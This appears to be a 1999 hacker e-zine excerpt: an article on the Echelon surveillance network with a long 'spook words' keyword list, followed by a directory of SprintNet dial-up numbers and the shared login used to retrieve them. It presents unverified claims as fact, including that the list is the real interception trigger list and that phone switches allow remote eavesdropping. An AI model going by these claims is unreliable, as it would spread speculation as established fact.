/KRh1gZQC73ydLB0fcrp6gswEQ5RzvHStoQgk0Q2TrRVSAW6IDAp3fDSy0/Vp5KL
BX/lBADdjiLlB7jJgj5g5G2iQejNUXN1uQ0HN6YDFQAhBE2alOrctJ3+PzeXJKvU
9cJaMLdxhQtjeFXHPui7KUH0+oP+Bsm1S5rYHYLXoIxhJqn7u+EAS6QNQnDXEeqU
OwxXqbSr0GR7FTjjuAJUZrR0wH9LroRNRrVd6eH2cZSY6xOjyrQgd2FyY2hpbGQg
PHBvbHltb3JwaEBob3RtYWlsLmNvbT6JAEsEEBECAAsFAjXfYxMECwMCAQAKCRAo
N2vIs9pmzML7AJ9OmHXQriDGVBRWUAHZfxL92S6IcQCgxENjPrHipa5C7LQkqZjN
oGBvs525BA0ENd9jFBAQAPkYoH5aBmF6Q5CV3AVsh4bsYezNRR8O2OCjecbJ3HoL
rOQ/40aUtjBKU9d8AhZIgLUV5SmZqZ8HdNP/46HFliBOmGW42A3uEF2rthccUdhQ
yiJXQym+lehWKzh4XAvb+ExN1eOqRsz7zhfoKp0UYeOEqU/Rg4Soebbvj6dDRgjG
zB13VyQ4SuLE8OiOE2eXTpITYfbb6yUOF/32mPfIfHmwch04dfv2wXPEgxEmK0Ng
w+Po1gr9oSgmC66prrNlD6IAUwGgfNaroxIe+g8qzh90hE/K8xfzpEDp19J3tkIt
AjbBJstoXp18mAkKjX4t7eRdefXUkk+bGI78KqdLfDL2Qle3CH8IF3KiutapQvMF
6PlTETlPtvFuuUs4INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ
+PVZX9x2Uk89PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarT
W56NoKVyOtQa8L9GAFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY72
88kjwEPwpVsYjY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy
1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XrPdYX
AAICEADh7NOOh8WDmYnTZ3PQiY/op0VMcNCySObEX+wkigF8HTw2g+f60ehn3h81
0QNIk+FUciFom9/1YrKave/pP+RNfAUqjGShTOJDvqhh1hHypQk8mOijchXrfYn3
BQVdmHlxiVdsk0ScrSCaiShu2XJVqyUj7nkkDTWbSBS4RAKpwDm3JqqIB4N0/Aj0
26UMdRHhhJfD/U269Xt7HlPUOyUAFQrxzFa2QvVvpL37TCA2EDreAuvcnuUByIyN
8OlAHP1VSKJl2mnAFEYw4jsXG7Cf3JVk2SLYQ+HpMaHKWuG0VGu/nwJcdHigZwnQ
21uCCIaWQAzdMz7bZkHN569nyJi6pxRZibeqtu+0vHNbS5cI66M77nnzKzvJnDx1
FoGTs0u0KUKRfTCO4RNUSE4THmtbPyn2GZ9oRgjkRJk9pQ6GmwzJSaJBChTxQ2P/
bHSU0qMk5MK733DlAh23qevzfMz96GJI88jbGwRJwO07KxyWU1sVhxcPXJmOc+f2
1oRzfPTDXgj1PaNVqcW5rrkSgVbXgR8rIun9QTx7HP1CM/FR7Gh+37BEglkvwFfT
WMWU9tmCqYfH+SmAjbIVFYKKPQzjd8wQn24GDvngwwVcSIKqHAZK0mllo3xQFc/k
nRuKfBQ4wKcar6Lau2ojWLYtq3LE4XIixfEeeCEXf3jSez6CmIkARgQYEQIABgUC
Nd9jFAAKCRAoN2vIs9pmzPhPAKCTnVl65YxmaaDOQyZS/QKF7s9/rACbBVWA4CYT
XF2X0OyDzmAN05XDiFY=
=6sLs
-----END PGP PUBLIC KEY BLOCK-----


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Echelon Continued ]:::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]:::
-->[OO]::::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]::::::::::::


After looking around on the net for echelon releated information (limeted)
we managed to find various snippets of information, as follows:

Codename: Echelon

A report to the European parliament states:

" Within Europe, all email, telephone and fax communications are
routinely intercepted by the United States National Security Agency,
transferring all target information from the European mainland ... to
[The headquarter of NSA] ... a global surveillance system that
stretches around the world to form a targeting system on all of the
key Intelsat satellites used to convey most of the world's satellite
phone calls, internet, email, faxes and telexes. ...unlike many of the
electronic spy systems developed during the cold war, ECHELON is
designed for primarily non-military targets: governments,
organisations and businesses in virtually every country... Five
nations share the results with the US as the senior partner ...
Britain, Canada, New Zealand and Australia are very much acting as
subordinate information servicers "


" But European diplomats are tearing the shroud of secrecy, tired
of snooping by the US on their citizens. The use of ECHELON
against European citizens was a central topic in a European
Parliament STOA report published this past January, "
Technologies
of Political Control, which confirmed a decades worth of reports
by several determined journalists about global spying by the NSA. "


DoD News Briefing, Tuesday, April 21, 1998, Captain Mike Doubleday, DASD (PA)

"
Captain Doubleday: Welcome to the briefing. I have no
announcements, so let me try and answer some questions. "

[Big snip, Last question..]

"
Q: Can you comment about a report recently to the European
parliament concerning the development these last years of U.S. and
British eavesdropping system called Echelon. "

"
A: I'm sorry to say I have absolutely nothing on that.
Press: Thank you. "


Despatches, BBC News December 18, 1997

"
A new report commissioned by the European Parliament has
officially confirmed the existence of what it says is a gigantic
electronic spy network that monitors almost all phone, fax and
other electronic communications in Europe. "

<snip>

. . . . "
I assume that it is all being monitored with keyword
scanning," Pike says. "They throw away almost all of the stuff
they collect. But they have that watch list for names and they are
working on voice-recognition software and that's going to be the
big thing in the future." Such technology is used jointly by NSA
and its allies as a "
creative" means to avoid court orders, Pike
claims.
. . . . In 1992, a year before the alleged bugging of the Seattle
conference, a group of agents for GCHQ, the British counterpart of
the NSA, blasted ECHELON. "
We feel we can no longer remain silent
regarding that which we regard to be gross malpractice and
negligence within the establishment in which we operate," the
intelligence agents told the London Observer. The British agents
claimed the NSA even helped intercept communications from Amnesty
International and Christian Aid. Asked about ECHELON, the NSA
says, "
We have no information to provide."
. . . . Given all this snooping, there is little wonder that a
worldwide market has developed for impenetrable encryption,...
"
What we need is strong encryption available to everybody. Yes,
it's going to cramp the style of the folks at the Puzzle Palace
[NSA], but a life more difficult at NSA means life is easier for
the rest of the planet. The benefits of promoting global Internet
commerce outweigh the harm to the NSA."
. . . . But, of course, exporting sophisticated encryption
technology is prohibited, and everything bureaucratically possible
is being done to restrict its widespread dissemination in the
United States and overseas."

Snoops, Sex and Videotape, Sept. 29, 1997
"The reason for the long silence, .[4 years] .. is that the
assignment was presented as being for the good of the country.
National security was at stake.... the classified information was
not leaked but deliberately provided through a complex chain of
agencies and operatives for the sole purpose of retaining
political power. Much of the information was real-time data that
went directly to the NSA via satellites, while other confidential
information was taken by FBI couriers to the NSA. In total, 10,000
to 15,000 conversations were recorded."

Snooping on Allies Embarrasses U.S, 10/20/97
"Blackmail, lies and deceit may be the only fitting description of
the 1993 Seattle Asia-Pacific Economic Cooperation, or APEC,
summit where dignitaries from 17 countries are reported to have
been placed under electronic surveillance by American agents"


<snip>

" The National Security Agency's top secret ECHELON Dictionary
system, run with Canada, NZ, UK, and Australia, monitors the
world's telephone, e-mail, and telex communications. "


Enough to make you shiva with fear: ISDN and SYSTEM-X switch remote spying:
***************************************************************************

4.4 National & International Communications Interceptions Networks Modern
communications systems are virtually transparent to the advanced
interceptions equipment which can be used to listen in. Some systems even
lend themselves to a dual role as a national interceptions network. For
example the message switching system used on digital exchanges like System X
in the UK supports an Integrated Services Digital Network (ISDN) protocol.
This allows digital devices. E.g. fax to share the system with existing
lines. The ISDN subset is defined in their documents as "Signalling CCITT1-
series interface for ISDN access. What is not widely known is that built in
to the international CCITT protocol is the ability to take phones 'off hook'
and listen to the conversations occurring near the phone, without the user
being aware that it is happening. (SGR Newsletter, No.4,1993) This
effectively means that a national dial up telephone tapping capacity is built
into these systems from the start. (System X has been exported to Russia and
China) Similarly, the digital technology required to pinpoint mobile phone
users for incoming phone calls, means that all mobile phone users in a
country when activated, are mini-tracking devices, giving their owners
whereabouts at any time and stored in the company's computer for up to two
years. Coupled with System X technology, this is a custom built mobile track,
tail and tap system par excellence. (Sunday telegraph, 2.2.97)
*****************************************************************************

"
The British watchdog group Statewatch revealed confidential
documents from the European Union's intergovernmental meetings
that show a global wiretapping system is under way among Europe,
the United States and other industrialized countries. "

Federation of American Scientists defines Echelon as:

"
ECHELON consists of a global network of computers that
automatically search through millions of intercepted for
pre-programmed keywords or fax, telex and e-mail addresses. Every
word of every message in the frequencies and channels selected at
a station is automatically searched. The processors in the network
are known as the ECHELON Dictionaries. ECHELON connects all these
computers and allows the individual stations to function as
distributed elements an integrated system. An ECHELON station's
Dictionary contains not only its parent agency's chosen keywords,
but also lists for each of the other four agencies in the UKUSA
system [NSA, GCHQ, DSD, GCSB and CSE] "

BT condemned for listing cables to US sigint station:

"
for revealing detailed information about top secret high
capacity cables feeding phone and other messages to and from a
Yorkshire monitoring base. BT admitted this week that they have
connected three digital optical fibre cables - capable of carrying
more than 100,000 telephone calls at once - to the American
intelligence base at Menwith Hill, near Harrogate. "The national
interest of the United Kingdom, even if if is conducted
dishonestly, requires this to be kept secret"
, said Judge
Crabtree. "

So it appears that the big brother spying system operates or is triggered by
certain words that could concern national/international security etc.. like,
for example, you are on the phone to someone and you say.. "
kill the
presedent "... <click> heh, well here is the list of words that will trigger
the spying system either through voice (phone) fax, or any other kind of
communication that can be digitaly monitored. The scary thing is, it appears
that system-x switches (the UK's digital switch network) have got built in
remote spying resources on them, i better be more carefull when talking to
my russian comrads about our world domination plans..

Rewson, SAFE, Waihopai, INFOSEC, ASPIC, MI6, Information Security,
SAI, Information Warfare, IW, IS, Privacy, Information Terrorism,
Terrorism Defensive Information, Defense Information Warfare,
Offensive Information, Offensive Information Warfare, The Artful
Dodger, NAIA, SAPM, ASU, ASTS, National Information Infrastructure,
InfoSec, SAO, Reno, Compsec, JICS, Computer Terrorism, Firewalls,
Secure Internet Connections, RSP, ISS, JDF, Ermes, Passwords, NAAP,
DefCon V, RSO, Hackers, Encryption, ASWS, CUN, CISU, CUSI, M.A.R.E.,
MARE, UFO, IFO, Pacini, Angela, Espionage, USDOJ, NSA, CIA, S/Key,
SSL, FBI, Secert Service, USSS, Defcon, Military, White House,
Undercover, NCCS, Mayfly, PGP, SALDV, PEM, resta, RSA, Perl-RSA,
MSNBC, bet, AOL, AOL TOS, CIS, CBOT, AIMSX, STARLAN, 3B2, BITNET,
SAMU, COSMOS, DATTA, Furbys, E911, FCIC, HTCIA, IACIS, UT/RUS, JANET,
ram, JICC, ReMOB, LEETAC, UTU, VNET, BRLO, SADCC, NSLEP, SACLANTCEN,
FALN, 877, NAVELEXSYSSECENGCEN, BZ, CANSLO, CBNRC, CIDA, JAVA, rsta,
Active X, Compsec 97, RENS, LLC, DERA, JIC, rip, rb, Wu, RDI,
Mavricks, BIOL, Meta-hackers, ^?, SADT, Steve Case, Tools, RECCEX,
Telex, OTAN, monarchist, NMIC, NIOG, IDB, MID/KL, NADIS, NMI, SEIDM,
BNC, CNCIS, STEEPLEBUSH, RG, BSS, DDIS, mixmaster, BCCI, BRGE,
Europol, SARL, Military Intelligence, JICA, Scully, recondo, Flame,
Infowar, Bubba, Freeh, Archives, ISADC, CISSP, Sundevil, jack,
Investigation, JOTS, ISACA, NCSA, ASVC, spook words, RRF, 1071, Bugs
Bunny, Verisign, Secure, ASIO, Lebed, ICE, NRO, Lexis-Nexis, NSCT,
SCIF, FLiR, JIC, bce, Lacrosse, Flashbangs, HRT, IRA, EODG, DIA,
USCOI, CID, BOP, FINCEN, FLETC, NIJ, ACC, AFSPC, BMDO, site, SASSTIXS,
NAVWAN, NRL, RL, NAVWCWPNS, NSWC, USAFA, AHPCRC, ARPA, SARD, LABLINK,
USACIL, SAPT, USCG, NRC, ~, O, NSA/CSS, CDC, DOE, SAAM, FMS, HPCC,
NTIS, SEL, USCODE, CISE, SIRC, CIM, ISN, DJC, LLNL, bemd, SGC, UNCPCJ,
CFC, SABENA, DREO, CDA, SADRS, DRA, SHAPE, bird dog, SACLANT, BECCA,
DCJFTF, HALO, SC, TA SAS, Lander, GSM, T Branch, AST, SAMCOMM, HAHO,
FKS, 868, GCHQ, DITSA, SORT, AMEMB, NSG, HIC, EDI, benelux, SAS, SBS,
SAW, UDT, EODC, GOE, DOE, SAMF, GEO, JRB, 3P-HV, Masuda, Forte, AT,
GIGN, Exon Shell, radint, MB, CQB, TECS, CONUS, CTU, RCMP, GRU, SASR,
GSG-9, 22nd SAS, GEOS, EADA, SART, BBE, STEP, Echelon, Dictionary,
MD2, MD4, MDA, diwn, 747, ASIC, 777, RDI, 767, MI5, 737, MI6, 757,
Kh-11, EODN, SHS, ^X, Shayet-13, SADMS, Spetznaz, Recce, 707, CIO,
NOCS, Halcon, NSS, Duress, RAID, Uziel, wojo, Psyops, SASCOM, grom,
NSIRL, D-11, DF, ZARK, SERT, VIP, ARC, S.E.T. Team, NSWG, MP5k, SATKA,
DREC, DEVGRP, DSD, FDM, GRU, LRTS, SIGDEV, NACSI, MEU/SOC,PSAC, PTT,
RFI, ZL31, SIGDASYS, TDM. SUKLO, Schengen, SUSLO, TELINT, fake, TEXTA.
ELF, LF, MF, Mafia, JASSM, CALCM, TLAM, Wipeout, GII, SIW, MEII, C2W,
Burns, Tomlinson, Ufologico Nazionale, Centro, CICAP, MIR, Belknap,
Tac, rebels, BLU-97 A/B, 007, nowhere.ch, bronze, Rubin, Arnett, BLU,
SIGS, VHF, Recon, peapod, PA598D28, Spall, dort, 50MZ, 11Emc Choe,
SATCOMA, UHF, The Hague, SHF, ASIO, SASP, WANK, Colonel, domestic
disruption, 5ESS, smuggle, Z-200, 15kg, DUVDEVAN, RFX, nitrate, OIR,
Pretoria, M-14, enigma, Bletchley Park, Clandestine, NSO, nkvd, argus,
afsatcom, CQB, NVD, Counter Terrorism Security, Enemy of the State,
SARA, Rapid Reaction, JSOFC3IP, Corporate Security, 192.47.242.7,
Baldwin, Wilma, ie.org, cospo.osis.gov, Police, Dateline, Tyrell, KMI,
1ee, Pod, 9705 Samford Road, 20755-6000, sniper, PPS, ASIS, ASLET,
TSCM, Security Consulting, M-x spook, Z-150T, High Security, Security
Evaluation, Electronic Surveillance, MI-17, ISR, NSAS,
Counterterrorism, real, spies, IWO, eavesdropping, debugging, CCSS,
interception, COCOT, NACSI, rhost, rhosts, ASO, SETA, Amherst,
Broadside, Capricorn, NAVCM, Gamma, Gorizont, Guppy, NSS, rita, ISSO,
submiss, ASDIC, .tc, 2EME REP, FID, 7NL SBS, tekka, captain, 226, .45,
nonac, .li, Tony Poe, MJ-12, JASON, Society, Hmong, Majic, evil,
zipgun, tax, bootleg, warez, TRV, ERV, rednoise, mindwar, nailbomb,
VLF, ULF, Paperclip, Chatter, MKULTRA, MKDELTA, Bluebird, MKNAOMI,
White Yankee, MKSEARCH, 355 ML, Adriatic, Goldman, Ionosphere, Mole,
Keyhole, NABS, Kilderkin, Artichoke, Badger, Emerson, Tzvrif, SDIS,
T2S2, STTC, DNR, NADDIS, NFLIS, CFD, BLU-114/B, quarter, Cornflower,
Daisy, Egret, Iris, JSOTF, Hollyhock, Jasmine, Juile, Vinnell, B.D.M.,
Sphinx, Stephanie, Reflection, Spoke, Talent, Trump, FX, FXR, IMF,
POCSAG, rusers, Covert Video, Intiso, r00t, lock picking, Beyond Hope,
LASINT, csystems, .tm, passwd, 2600 Magazine, JUWTF, Competitor, EO,
Chan, Pathfinders, SEAL Team 3, JTF, Nash, ISSAA, B61-11, Alouette,
executive, Event Security, Mace, Cap-Stun, stakeout, ninja, ASIS, ISA,
EOD, Oscor, Tarawa, COSMOS-2224, COSTIND, hit word, hitword, Hitwords,
Regli, VBS, Leuken-Baden, number key, Zimmerwald, DDPS, GRS, AGT.
AMME, ANDVT, Type I, Type II, VFCT, VGPL, WHCA, WSA, WSP, WWABNCP,
ZNI1, FSK, FTS2000, GOSIP, GOTS, SACS STU-III, PRF, PMSP, PCMT, I&A,
JRSC, ITSDN, Keyer, KG-84C, KWT-46, KWR-46, KY-75, KYV-5, LHR,
PARKHILL, LDMX, LEASAT, SNS, SVN, TACSAT, TRANSEC, DONCAF, EAM, DSCS,
DSNET1, DSNET2, DSNET3, ECCM, EIP, EKMS, EKMC, DDN, DDP, Merlin, NTT,
SL-1, Rolm, TIE, Tie-fighter, PBX, SLI, NTT, MSCJ, MIT, 69, RIT, Time,
MSEE, Cable & Wireless, CSE, SUW, J2, Embassy, ETA, Porno, Fax, finks,
Fax encryption, white noise, Fernspah, MYK, GAFE, forcast, import,
rain, tiger, buzzer, N9, pink noise, CRA, M.P.R.I., top secret,
Mossberg, 50BMG, Macintosh Security, Macintosh Internet Security, OC3,
Macintosh Firewalls, Unix Security, VIP Protection, SIG, sweep, Medco,
TRD, TDR, Z, sweeping, SURSAT, 5926, TELINT, Audiotel, Harvard, 1080H,
SWS, Asset, Satellite imagery, force, NAIAG, Cypherpunks, NARF, 127,
Coderpunks, TRW, remailers, replay, redheads, RX-7, explicit, FLAME,
J-6, Pornstars, AVN, Playboy, ISSSP, Anonymous, W, Sex, chaining,
codes, Nuclear, 20, subversives, SLIP, toad, fish, data havens, unix,
c, a, b, d, SUBACS, the, Elvis, quiche, DES, 1*, N-ISDN, NLSP, OTAR,
OTAT, OTCIXS, MISSI, MOSAIC, NAVCOMPARS, NCTS, NESP, MILSATCOM,
AUTODIN, BLACKER, C3I, C4I, CMS, CMW, CP, SBU, SCCN, SITOR, SHF/DOD,
Finksburg MD, Link 16, LATA, NATIA, NATOA, sneakers, UXO, (), OC-12,
counterintelligence, Shaldag, sport, NASA, TWA, DT, gtegsc, nowhere,
.ch, hope, emc, industrial espionage, SUPIR, PI, TSCI, spookwords,
industrial intelligence, H.N.P., SUAEWICS, Juiliett Class Submarine,
Locks, qrss, loch, 64 Vauxhall Cross, Ingram Mac-10, wwics, sigvoice,
ssa, E.O.D., SEMTEX, penrep, racal, OTP, OSS, Siemens, RPC, Met,
CIA-DST, INI, watchers, keebler, contacts, Blowpipe, BTM, CCS, GSA,
Kilo Class, squib, primacord, RSP, Z7, Becker, Nerd, fangs, Austin,
no|d, Comirex, GPMG, Speakeasy, humint, GEODSS, SORO, M5, BROMURE,
ANC, zone, SBI, DSS, S.A.I.C., Minox, Keyhole, SAR, Rand Corporation,
Starr, Wackenhutt, EO, burhop, Wackendude, mol, Shelton, 2E781, F-22,
2010, JCET, cocaine, Vale, IG, Kosovo, Dake, 36,800, Hillal, Pesec,
Hindawi, GGL, NAICC, CTU, botux, Virii, CCC, ISPE, CCSC, Scud, SecDef,
Magdeyev, VOA, Kosiura, Small Pox, Tajik, +=, Blacklisted 411, TRDL,
Internet Underground, BX, XS4ALL, wetsu, muezzin, Retinal Fetish, WIR,
Fetish, FCA, Yobie, forschung, emm, ANZUS, Reprieve, NZC-332, edition,
cards, mania, 701, CTP, CATO, Phon-e, Chicago Posse, NSDM, l0ck,
beanpole, spook, keywords, QRR, PLA, TDYC, W3, CUD, CdC, Weekly World
News, Zen, World Domination, Dead, GRU, M72750, Salsa, 7, Blowfish,
Gorelick, Glock, Ft. Meade, NSWT, press-release, WISDIM, burned,
Indigo, wire transfer, e-cash, Bubba the Love Sponge, Enforcers,
Digicash, zip, SWAT, Ortega, PPP, NACSE, crypto-anarchy, AT&T, SGI,
SUN, MCI, Blacknet, ISM, JCE, Middleman, KLM, Blackbird, NSV, GQ360,
X400, Texas, jihad, SDI, BRIGAND, Uzi, Fort Meade, *&, gchq.gov.uk,
supercomputer, bullion, 3, NTTC, Blackmednet, :, Propaganda, ABC,
Satellite phones, IWIS, Planet-1, ISTA, rs9512c, Jiang Zemin, South
Africa, Sergeyev, Montenegro, Toeffler, Rebollo, sorot, Yucca
Mountain, FARC, Toth, Xu Yongyue, Bach, Razor, AC, cryptanalysis,
nuclear, 52 52 N - 03 03 W, Morgan, Canine, GEBA, INSCOM, MEMEX,
Stanley, FBI, Panama, fissionable, Sears Tower, NORAD, Delta Force,
SEAL, virtual, WASS, WID, Dolch, secure shell, screws, Black-Ops, O/S,
Area51, SABC, basement, ISWG, $@, data-haven, NSDD, black-bag, rack,
TEMPEST, Goodwin, rebels, ID, MD5, IDEA, garbage, market, beef, Stego,
ISAF, unclassified, Sayeret Tzanhanim, PARASAR, Gripan, pirg, curly,
Taiwan, guest, utopia, NSG, orthodox, CCSQ, Alica, SHA, Global,
gorilla, Bob, UNSCOM, Fukuyama, Manfurov, Kvashnin, Marx, Abdurahmon,
snullen, Pseudonyms, MITM, NARF, Gray Data, VLSI, mega, Leitrim,
Yakima, NSES, Sugar Grove, WAS, Cowboy, Gist, 8182, Gatt, Platform,
1911, Geraldton, UKUSA, veggie, XM, Parvus, NAVSVS, 3848, Morwenstow,
Consul, Oratory, Pine Gap, Menwith, Mantis, DSD, BVD, 1984, blow out,
BUDS, WQC, Flintlock, PABX, Electron, Chicago Crust, e95, DDR&E, 3M,
KEDO, iButton, R1, erco, Toffler, FAS, RHL, K3, Visa/BCC, SNT,
Ceridian, STE, condor, CipherTAC-2000, Etacs, Shipiro, ssor, piz,
fritz, KY, 32, Edens, Kiwis, Kamumaruha, DODIG, Firefly, HRM,
Albright, Bellcore, rail, csim, NMS, 2c, FIPS140-1, CAVE, E-Bomb,
CDMA, Fortezza, 355ml, ISSC, cybercash, NAWAS, government, NSY, hate,
speedbump, joe, illuminati, BOSS, Kourou, Misawa, Morse, HF, P415,
ladylove, filofax, Gulf, lamma, Unit 5707, Sayeret Mat'Kal, Unit 669,
Sayeret Golani, Lanceros, Summercon, NSADS, president, ISFR, freedom,
ISSO, walburn, Defcon VI, DC6, Larson, P99, HERF pipe-bomb, 2.3 Oz.,
cocaine, $, imapct, Roswell, ESN, COS, E.T., credit card, b9, fraud,
  
ST1, assasinate, virus, ISCS, ISPR, anarchy, rogue, mailbomb, 888,
Chelsea, 1997, Whitewater, MOD, York, plutonium, William Gates, clone,
BATF, SGDN, Nike, WWSV, Atlas, IWWSVCS, Delta, TWA, Kiwi, PGP 2.6.2.,
PGP 5.0i, PGP 5.1, siliconpimp, SASSTIXS, IWG, Lynch, 414, Face,
Pixar, IRIDF, NSRB, eternity server, Skytel, Yukon, Templeton,
Johohonbu, LUK, Cohiba, Soros, Standford, niche, ISEP, ISEC, 51, H&K,
USP, ^, sardine, bank, EUB, USP, PCS, NRO, Red Cell, NSOF, DC7, Glock
26, snuffle, Patel, package, ISI, INR, INS, GRU, RUOP, GSS, NSP, SRI,
Ronco, Armani, BOSS, Chobetsu, FBIS, BND, SISDE, FSB, BfV, IB,
froglegs, JITEM, SADF, advise, TUSA, LITE, PKK, HoHoCon, SISMI, ISG,
FIS, MSW, Spyderco, UOP, SSCI, NIMA, HAMASMOIS, SVR, SIN, advisors,
SAP, Monica, OAU, PFS, Aladdin, AG, chameleon man, Hutsul, CESID,
Bess, rail gun, .375, Peering, CSC, Tangimoana Beach, Commecen,
Vanuatu, Kwajalein, LHI, DRM, GSGI, DST, MITI, JERTO, SDF, Koancho,
Blenheim, Rivera, Kyudanki, varon, 310, 17, 312, NB, CBM, CTP,
Sardine, SBIRS, jaws, SGDN, ADIU, DEADBEEF, IDP, IDF, Halibut,
SONANGOL, Flu, &, Loin, PGP 5.53, meta, Faber, SFPD, EG&G, ISEP,
blackjack, Fox, Aum, AIEWS, AMW, RHL, Baranyi, WORM, MP5K-SD, 1071,
WINGS, cdi, VIA, DynCorp, UXO, Ti, WWSP, WID, osco, Mary, honor,
Templar, THAAD, package, CISD, ISG, BIOLWPN, JRA, ISB, ISDS, chosen,
LBSD, van, schloss, secops, DCSS, DPSD, LIF, J-Star, PRIME, SURVIAC,
telex, Analyzer, embassy, Golf, B61-7, Maple, Tokyo, ERR, SBU, Threat,
JPL, Tess, SE, Alex, EPL, SPINTCOM, FOUO, ISS-ADP, Merv, Mexico, SUR,
blocks, SO13, Rojdykarna, RSOC, USS Banner, S511, 20755, airframe,
jya.com, Furby, PECSENC, football, Agfa, 3210, Crowell, moore, 510,
OADR, Smith, toffee, FIS, N5P6, EuroFed, SP4, shelter, Crypto AG,

So there you have it, the " spook " list.. why the hell is football in there,
don't ask me, this list was compiled by information leaking UK intellegence
leaking employees of Mi[x].. Remember, big brother IS watching you, George
Orwell at large HEH !.. take it easy.

Continued research by hybrid (hybrid@dtmf.org)


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ SprintNet Local Access ]:::[OO--[ by redshadow ]:::::::::::::::::::
-->[OO]:[ Telephone numbers ]:::::::-[ redshadow@coldmail.com ]:::::::::
-->]OO[:::::::::::::::::::::::::::::::::::[ http://redshadow.faithweb.com ]::

Shouts
-( z0mba | ginger | kraise | hybrid | simmeth | mranon | #darkcyde )-


:*: SprintNet Local Access Telephone Numbers :*:


Welcome one and all to my run down on the latest as of Sprint's last update
[February 16, 1999] SprintNet local access #s. I extracted this information
as you can by dialing "1 800 546 2500" enter "@D" and a Carriage Return,
Enter D1 at the TERMINAL= prompt, then your AREA CODE / Local Exchange, at
the @ enter "mail" for user name and password enter "phones".

The 1999 SprintNet Access directory is available and can be ordered at 800/
736-1130. For customer service, call toll-free 1-800/877-5045. From overseas
locations with non-WATS access, call 404/649-4970.



]A.1[ Domestic Asynchronous Dial Service
]A.2[ Domestic Asynchronous Dial Service aT 300, 1200 and 2400 BPS
]A.3[ Domestic Asynchronous Dial Service aT 14400 BPS
] B [ International Asynchronous Dial Service
] C [ Domestic X.25 Dial Service



]A.1[ DOMESTIC ASYNCHRONOUS DIAL SERVICE


- for asynchronous applications
- at 300, 1200, 2400, 9600 and 14400 bps
- with optional local error protection

Asynchronous Dial Service enables you to conveniently access the SprintNet
data network with a local telephone call from thousands of U.S. cities and
towns. For areas without local access in the U.S., use SprintNet's In-WATS
service.


In-WATS Service Telephone Number
----------------------------------------
300-2400 bps 1-800/546-1000
9600/14400 bps 1-800/546-2500

Consult the Data Network Rate Schedule for In-WATS pricing.


Domestic Service Requirements
-----------------------------
SPEED: MODEM TYPE:
300 bps Bell 103 compatible
1200 bps Bell 212A compatible
2400 bps V.22 bis compatible
9600 bps ITU V.32 compatible
14400 bps ITU V.32 bis compatible

Optional Local Error Protection
-------------------------------
When using local error protection for speeds of 2400 bps or less, your modem
must be MNP compatible, or you can use MNP compatible software in your PC.
For V.32 9600 or 14400 bps service, your modem should be MNP or V.42
compatible.

Note: Dial the 2400 bps access number when using local error
protection at 300, 1200 or 2400 bps.

ASYNC.ME:
ASYNC.ME:

]A.2[ DOMESTIC ASYNCHRONOUS DIAL SERVICE AT 300, 1200 AND 2400 BPS


300/1200/2400
ST AC CITY BPS CLASS
-------------------------------------------------------------
In-WATS 800 546-1000 -

CA 310 Compton 516-1007 C

CT 860 Middletown 344-8217 B
CT 860 New Britain 225-7027 B
CT 203 Norwalk 866-7404 B

HI 800 Other Islands 272-5299 (1)

WI 414 Kenosha 552-9242 C
WI 414 Racine 632-2174 C
WI 920 Sheboygan 452-3995 C
WI 414 West Bend 334-2206 B

(1) International data rates apply.


]A.3[ DOMESTIC ASYNCHRONOUS DIAL SERVICE AT 14400 BPS

V.32bis
ST AC CITY 14000 BPS CLASS
-- ---- --------------- -----------------------
** 800 In- WATS 546-2500 -

AK 907 Anchorage 276-0453 (1)
AK 907 Juneau 586-4342 (1)

AK 907 Barrow 852-2425 (2)
AK 907 Bethel 543-2411 (2)
AK 907 Cold Bay 532-2371 (2)
AK 907 Cordova 424-3744 (2)
AK 907 Deadhorse 659-2777 (2)
AK 907 Delta Junction 895-5070 (2)
AK 907 Dillingham 842-2688 (2)
AK 907 Fairbanks 456-3282 (2)
AK 907 Glennallen 822-5231 (2)
AK 907 Homer 235-5239 (2)
AK 907 Iliamna 571-1364 (2)
AK 907 Ketchikan 225-1871 (2)
AK 907 King Salmon 246-3049 (2)
AK 907 Kodiak 486-4061 (2)
AK 907 Kotzebue 442-2602 (2)
AK 907 McGrath 524-3256 (2)
AK 907 Nome 443-2256 (2)
AK 907 Northway 778-2301 (2)
AK 907 Palmer 745-0200 (2)
AK 907 Prudhoe Bay 659-2777 (2)
AK 907 St Paul 546-2320 (2)
AK 907 Seward 224-3126 (2)
AK 907 Sitka 747-5887 (2)
AK 907 Soldotna 262-1990 (2)
AK 907 Tanana 366-7167 (2)
AK 907 Valdez 835-4987 (2)
AK 907 Yakutat 784-3453 (2)

AL 256 Anniston 236-9711 B
AL 205 Birmingham 328-5719 B
AL 256 Decatur 355-0206 B
AL 334 Dothan 793-5034 B
AL 256 Florence 767-0497 B
AL 256 Huntsville 533-6787 B
AL 334 Mobile 432-9190 B
AL 334 Montgomery 264-7284 B
AL 205 Tuscaloosa 758-5799 B

AR 501 Fayetteville 442-0212 B
AR 501 Ft Smith 782-2852 B
AR 501 Hot Springs 623-3159 B
AR 501 Little Rock 375-4177 B

AZ 520 Flagstaff 773-0588 B
AZ 602 Phoenix 254-1903 A
AZ 520 Tucson 620-0658 B

CA 805 Bakersfield 631-0577 B
CA 530 Chico 894-6882 B
CA 909 Colton 824-5571 B
CA 925 Concord 687-0216 C
CA 909 Corona 278-1211 B
CA 530 Davis 753-4387 B
CA 760 Escondido 738-0203 B
CA 707 Eureka 444-3091 B
CA 707 Fairfield 426-3860 B
CA 510 Fremont 249-9220 B
CA 559 Fresno 233-6928 B
CA 714 Garden Grove 379-7400 B
CA 818 Glendale 507-0511 B
CA 510 Hayward 538-0623 B
CA 805 Lancaster 949-7396 B
CA 323 Los Angeles 937-5526 A
CA 310 Marina Del Rey 306-3450 B
CA 209 Merced 383-2557 B
CA 209 Modesto 576-2852 B
CA 408 Monterey 655-1925 C
CA 707 Napa 257-0217 B
CA 510 Oakland 836-3844 B
CA 760 Oceanside 430-0613 C
